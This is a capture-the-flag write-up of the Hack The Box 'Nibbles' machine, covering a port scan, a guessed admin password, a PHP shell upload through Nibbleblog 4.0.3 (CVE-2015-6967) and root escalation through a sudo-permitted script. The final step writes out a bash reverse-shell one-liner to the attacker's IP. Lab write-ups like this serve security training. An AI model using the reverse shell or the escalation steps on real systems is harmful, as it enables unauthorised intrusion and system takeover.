How to crack Nibbles box without Metasploit.
tl;dr
- Nibbleblog v4.0.3 Code Execution
- CVE-2015-6967
Solved by: 7h3M0nk
A Linux box with IP 10.10.10.75
Enumeration
Let’s start by doing a port scan. I am using nmap enumeratior, so doing a basic scan
1 |
|
The box has two services one OpenSSH at port 22 and an Apache server at port 80. The Apache version mentioned here is vulnerable to the shellshock vulnerability. On checking the http://10.10.10.75/cgi-bin/ , it’s showing directory not found.
Time to move on.
On checking the page source, I got the info
Let’s checkout the /nibbleblog directory.
Time to get more info on Nibbles. Doing a serach on Nibble Blog landed me into a page which describes how one can upload a shell to Nibble 4.0.3 version.
As per the blog, if I get admin access then I can upload a php shell.
Checking if admin.php exists.
This is where I got stuck for a while, tried to login using some default passwords this got me blacklisted. Tried the page after a couple of minutes, not blacklisted anymore. Brute forcing won’t work here. Need to guess!
Tried admin:nibbles which worked got admin access. Pheeww!
Exploit
Recreating the steps given in the blog.
Uploading a php shell
Moving to the plugin directory, and opening the shell and getting the user flag.
We don’t have root access till now, let’s check if the user has any binaries with sudo permission.
1 | sudo -l |
Nice! The directory personal/stuff is not present. Let’s make one and add the file monitor.sh.
We can use this to create a reverse shell and get the root flag.
1 | [email protected]:/home/nibbler/personal/stuff# touch monitor.sh;echo "#!/bin/bash" >> monitor.sh; echo "bash -i >& /dev/tcp/10.10.14.7/800 0>&1" >> monitor.sh |
And that’s how I solved Nibbles!